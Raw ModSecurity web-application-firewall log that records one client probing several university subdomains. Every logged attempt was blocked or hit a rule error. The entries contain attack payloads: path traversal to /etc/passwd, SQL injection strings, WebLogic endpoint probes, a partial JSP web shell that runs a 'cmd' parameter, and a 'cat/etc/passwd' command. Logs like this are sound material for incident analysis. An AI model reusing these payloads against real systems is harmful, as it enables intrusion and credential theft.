[Tue Aug 29 11:47:42.382843 2023] [:error] [pid 2230] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14bsCo-f0AAAi2yJ4AAAAN"]
[Tue Aug 29 11:47:42.387935 2023] [:error] [pid 2131] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14bsCo-f0AAAhT4CYAAAAD"]
[Tue Aug 29 11:47:42.403160 2023] [:error] [pid 2230] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14bsCo-f0AAAi2yJ8AAAAN"]
[Tue Aug 29 11:47:42.427543 2023] [:error] [pid 2317] [client 143.42.78.27] ModSecurity: Rule 7fe1c63de7c8 [id "950901"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "77"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "www.unla.ac.id"] [uri "/wls-wsat/CoordinatorPortType"] [unique_id "ZO14bsCo-f0AAAkNPnYAAAAI"]
[Tue Aug 29 11:47:42.432448 2023] [:error] [pid 2317] [client 143.42.78.27] ModSecurity: Rule 7fe1c5ef2158 [id "981247"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "243"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "www.unla.ac.id"] [uri "/wls-wsat/CoordinatorPortType"] [unique_id "ZO14bsCo-f0AAAkNPnYAAAAI"]
[Tue Aug 29 11:47:42.495388 2023] [:error] [pid 2230] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/index.php"] [unique_id "ZO14bsCo-f0AAAi2yKEAAAAN"]
[Tue Aug 29 11:47:42.497016 2023] [:error] [pid 1988] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14bsCo-f0AAAfECGAAAAAO"]
[Tue Aug 29 11:47:42.532345 2023] [:error] [pid 2310] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14bsCo-f0AAAkGCTYAAAAE"]
[Tue Aug 29 11:47:43.440175 2023] [:error] [pid 2317] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14b8Co-f0AAAkNPnoAAAAI"]
[Tue Aug 29 11:47:43.527159 2023] [:error] [pid 2293] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:sb_category. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: -- - found within ARGS:sb_category: ') OR true-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/module/ph_simpleblog/list"] [unique_id "ZO14b8Co-f0AAAj118EAAAAa"]
[Tue Aug 29 11:47:43.550541 2023] [:error] [pid 2310] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:sb_category. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: -- - found within ARGS:sb_category: ') OR true-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/module/ph_simpleblog/list"] [unique_id "ZO14b8Co-f0AAAkGCTcAAAAE"]
[Tue Aug 29 11:47:43.612786 2023] [:error] [pid 1988] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:sb_category. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: -- - found within ARGS:sb_category: ') OR true-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/module/ph_simpleblog/list"] [unique_id "ZO14b8Co-f0AAAfECGIAAAAO"]
[Tue Aug 29 11:47:43.637118 2023] [:error] [pid 2304] [client 143.42.78.27] ModSecurity: Rule 7fe1c63de7c8 [id "950901"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "77"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "www.unla.ac.id"] [uri "/wls-wsat/CoordinatorPortType"] [unique_id "ZO14b8Co-f0AAAkAL8MAAAAU"]
[Tue Aug 29 11:47:43.647074 2023] [:error] [pid 2304] [client 143.42.78.27] ModSecurity: Rule 7fe1c5ef2158 [id "981247"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "243"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "www.unla.ac.id"] [uri "/wls-wsat/CoordinatorPortType"] [unique_id "ZO14b8Co-f0AAAkAL8MAAAAU"]
[Tue Aug 29 11:47:43.675456 2023] [:error] [pid 2252] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:sb_category. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: -- - found within ARGS:sb_category: ') OR true-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/module/ph_simpleblog/list"] [unique_id "ZO14b8Co-f0AAAjM7GQAAAAT"]
[Tue Aug 29 11:47:43.694641 2023] [:error] [pid 2266] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../ found within ARGS:url: ../../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/templates/default/html/windows/right.php"] [unique_id "ZO14b8Co-f0AAAjav4UAAAAV"]
[Tue Aug 29 11:47:43.773414 2023] [:error] [pid 2266] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:sb_category. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: -- - found within ARGS:sb_category: ') OR true-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/module/ph_simpleblog/list"] [unique_id "ZO14b8Co-f0AAAjav4YAAAAV"]
[Tue Aug 29 11:47:44.358601 2023] [:error] [pid 2285] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../ found within ARGS:url: ../../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/templates/default/html/windows/right.php"] [unique_id "ZO14cMCo-f0AAAjtc3MAAAAX"]
[Tue Aug 29 11:47:44.360624 2023] [:error] [pid 2131] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../ found within ARGS:url: ../../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/templates/default/html/windows/right.php"] [unique_id "ZO14cMCo-f0AAAhT4CoAAAAD"]
[Tue Aug 29 11:47:44.362443 2023] [:error] [pid 2310] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../ found within ARGS:url: ../../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/templates/default/html/windows/right.php"] [unique_id "ZO14cMCo-f0AAAkGCTgAAAAE"]
[Tue Aug 29 11:47:44.367167 2023] [:error] [pid 2245] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../ found within ARGS:url: ../../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/templates/default/html/windows/right.php"] [unique_id "ZO14cMCo-f0AAAjFofIAAAAF"]
[Tue Aug 29 11:47:44.393090 2023] [:error] [pid 2305] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:sb_category. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: -- - found within ARGS:sb_category: ') AND false-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/module/ph_simpleblog/list"] [unique_id "ZO14cMCo-f0AAAkBKngAAAAb"]
[Tue Aug 29 11:47:44.396719 2023] [:error] [pid 2245] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:sb_category. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: -- - found within ARGS:sb_category: ') AND false-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/module/ph_simpleblog/list"] [unique_id "ZO14cMCo-f0AAAjFofMAAAAF"]
[Tue Aug 29 11:47:44.420837 2023] [:error] [pid 2251] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:sb_category. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: -- - found within ARGS:sb_category: ') AND false-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/module/ph_simpleblog/list"] [unique_id "ZO14cMCo-f0AAAjL8V4AAAAR"]
[Tue Aug 29 11:47:44.421655 2023] [:error] [pid 2242] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../ found within ARGS:url: ../../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/templates/default/html/windows/right.php"] [unique_id "ZO14cMCo-f0AAAjCbKwAAAAB"]
[Tue Aug 29 11:47:44.440414 2023] [:error] [pid 2251] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:sb_category. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: -- - found within ARGS:sb_category: ') AND false-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/module/ph_simpleblog/list"] [unique_id "ZO14cMCo-f0AAAjL8V8AAAAR"]
[Tue Aug 29 11:47:44.476557 2023] [:error] [pid 2251] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:sb_category. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: -- - found within ARGS:sb_category: ') AND false-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/module/ph_simpleblog/list"] [unique_id "ZO14cMCo-f0AAAjL8WAAAAAR"]
[Tue Aug 29 11:47:44.588566 2023] [:error] [pid 2285] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:sb_category. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: -- - found within ARGS:sb_category: ') OR true-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/module/ph_simpleblog/list"] [unique_id "ZO14cMCo-f0AAAjtc3oAAAAX"]
[Tue Aug 29 11:47:45.353067 2023] [:error] [pid 2285] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:<%@ page import. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: .*\\x22%>\\x0d\\x0a<%\\x0d\\x0a found within ARGS:<%@ page import: \\x22java.util.*,java.io.*\\x22%>\\x0d\\x0a<%\\x0d\\x0aif (request.getParameter(\\x22cmd\\x22) != null) {\\x0d\\x0a        out.println(\\x22Command: \\x22   request.getParameter(\\x22cmd\\x22)   \\x22<BR>\\x22);\\x0d\\x0a        Process p = Runtime.getRuntime().exec(request.getParameter(\\x22cmd\\x22));\\x0d\\x0a        OutputStream os = p.getOutputStream();\\x0d\\x0a        InputStream in = p.getInputStream();\\x0d\\x0a        DataInputStream dis = new D..."] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/poc.jsp/"] [unique_id "ZO14ccCo-f0AAAjtc3sAAAAX"]
[Tue Aug 29 11:47:45.439893 2023] [:error] [pid 2230] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:<%@ page import. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: .*\\x22%>\\x0d\\x0a<%\\x0d\\x0a found within ARGS:<%@ page import: \\x22java.util.*,java.io.*\\x22%>\\x0d\\x0a<%\\x0d\\x0aif (request.getParameter(\\x22cmd\\x22) != null) {\\x0d\\x0a        out.println(\\x22Command: \\x22   request.getParameter(\\x22cmd\\x22)   \\x22<BR>\\x22);\\x0d\\x0a        Process p = Runtime.getRuntime().exec(request.getParameter(\\x22cmd\\x22));\\x0d\\x0a        OutputStream os = p.getOutputStream();\\x0d\\x0a        InputStream in = p.getInputStream();\\x0d\\x0a        DataInputStream dis = new D..."] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/poc.jsp/"] [unique_id "ZO14ccCo-f0AAAi2yKkAAAAN"]
[Tue Aug 29 11:47:45.462874 2023] [:error] [pid 2230] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:<%@ page import. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: .*\\x22%>\\x0d\\x0a<%\\x0d\\x0a found within ARGS:<%@ page import: \\x22java.util.*,java.io.*\\x22%>\\x0d\\x0a<%\\x0d\\x0aif (request.getParameter(\\x22cmd\\x22) != null) {\\x0d\\x0a        out.println(\\x22Command: \\x22   request.getParameter(\\x22cmd\\x22)   \\x22<BR>\\x22);\\x0d\\x0a        Process p = Runtime.getRuntime().exec(request.getParameter(\\x22cmd\\x22));\\x0d\\x0a        OutputStream os = p.getOutputStream();\\x0d\\x0a        InputStream in = p.getInputStream();\\x0d\\x0a        DataInputStream dis = new D..."] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/poc.jsp/"] [unique_id "ZO14ccCo-f0AAAi2yKoAAAAN"]
[Tue Aug 29 11:47:46.285523 2023] [:error] [pid 2330] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:<%@ page import. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: .*\\x22%>\\x0d\\x0a<%\\x0d\\x0a found within ARGS:<%@ page import: \\x22java.util.*,java.io.*\\x22%>\\x0d\\x0a<%\\x0d\\x0aif (request.getParameter(\\x22cmd\\x22) != null) {\\x0d\\x0a        out.println(\\x22Command: \\x22   request.getParameter(\\x22cmd\\x22)   \\x22<BR>\\x22);\\x0d\\x0a        Process p = Runtime.getRuntime().exec(request.getParameter(\\x22cmd\\x22));\\x0d\\x0a        OutputStream os = p.getOutputStream();\\x0d\\x0a        InputStream in = p.getInputStream();\\x0d\\x0a        DataInputStream dis = new D..."] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/poc.jsp/"] [unique_id "ZO14csCo-f0AAAkaC90AAAAJ"]
[Tue Aug 29 11:47:46.468232 2023] [:error] [pid 2330] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:<%@ page import. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: .*\\x22%>\\x0d\\x0a<%\\x0d\\x0a found within ARGS:<%@ page import: \\x22java.util.*,java.io.*\\x22%>\\x0d\\x0a<%\\x0d\\x0aif (request.getParameter(\\x22cmd\\x22) != null) {\\x0d\\x0a        out.println(\\x22Command: \\x22   request.getParameter(\\x22cmd\\x22)   \\x22<BR>\\x22);\\x0d\\x0a        Process p = Runtime.getRuntime().exec(request.getParameter(\\x22cmd\\x22));\\x0d\\x0a        OutputStream os = p.getOutputStream();\\x0d\\x0a        InputStream in = p.getInputStream();\\x0d\\x0a        DataInputStream dis = new D..."] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/poc.jsp/"] [unique_id "ZO14csCo-f0AAAkaC@MAAAAJ"]
[Tue Aug 29 11:47:47.189209 2023] [:error] [pid 2266] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:sb_category. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: -- - found within ARGS:sb_category: ') AND false-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/module/ph_simpleblog/list"] [unique_id "ZO14c8Co-f0AAAjav4gAAAAV"]
[Tue Aug 29 11:47:47.207263 2023] [:error] [pid 2252] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:cmd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:cmd: cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "informatika.unla.ac.id"] [uri "/poc.jsp"] [unique_id "ZO14c8Co-f0AAAjM7GgAAAAT"]
[Tue Aug 29 11:47:47.247424 2023] [:error] [pid 2333] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:cmd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:cmd: cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "journal.unla.ac.id"] [uri "/poc.jsp"] [unique_id "ZO14c8Co-f0AAAkdu24AAAAO"]
[Tue Aug 29 11:47:47.273883 2023] [:error] [pid 2332] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:cmd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:cmd: cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "ft.unla.ac.id"] [uri "/poc.jsp"] [unique_id "ZO14c8Co-f0AAAkcgSgAAAAM"]
[Tue Aug 29 11:47:47.358812 2023] [:error] [pid 2252] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:cmd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:cmd: cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "pusatbahasa.unla.ac.id"] [uri "/poc.jsp"] [unique_id "ZO14c8Co-f0AAAjM7G0AAAAT"]
[Tue Aug 29 11:47:47.387491 2023] [:error] [pid 2266] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:<%@ page import. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: .*\\x22%>\\x0d\\x0a<%\\x0d\\x0a found within ARGS:<%@ page import: \\x22java.util.*,java.io.*\\x22%>\\x0d\\x0a<%\\x0d\\x0aif (request.getParameter(\\x22cmd\\x22) != null) {\\x0d\\x0a        out.println(\\x22Command: \\x22   request.getParameter(\\x22cmd\\x22)   \\x22<BR>\\x22);\\x0d\\x0a        Process p = Runtime.getRuntime().exec(request.getParameter(\\x22cmd\\x22));\\x0d\\x0a        OutputStream os = p.getOutputStream();\\x0d\\x0a        InputStream in = p.getInputStream();\\x0d\\x0a        DataInputStream dis = new D..."] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/poc.jsp/"] [unique_id 